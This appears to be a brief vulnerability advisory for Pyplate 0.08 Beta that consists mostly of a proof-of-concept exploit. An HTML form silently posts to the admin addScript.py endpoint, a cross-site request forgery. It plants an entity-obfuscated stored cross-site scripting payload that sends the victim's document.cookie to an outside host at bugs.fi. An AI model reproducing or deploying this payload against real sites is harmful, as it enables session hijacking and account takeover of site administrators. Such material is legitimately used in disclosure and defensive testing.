Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.

Pyplate 0.08 Beta is vulnerable; other versions may also be affected.

<html>
  <body>
    <form action="http://www.example.com/admin/addScript.py"; method="POST">
      <input type="hidden" name="title" 
value="<script>new&#32;Image&#40;&#41;&#46;src&#61;"http&#58;&#47;&#47;bugs&#46;fi&#47;evil&#46;py&#63;cookie&#61;"&#32;encodeURI&#40;document&#46;cookie&#41;&#59;<&#47;script>"
 />
      <input type="hidden" name="file" value="bugs" />
      <input type="hidden" name="category" value="&#47;" />
      <input type="hidden" name="post" value="<p>bugs<&#47;p>&#13;&#10;" />
      <input type="hidden" name="tags" value="" />
      <input type="hidden" name="description" value="" />
      <input type="hidden" name="state" value="new" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>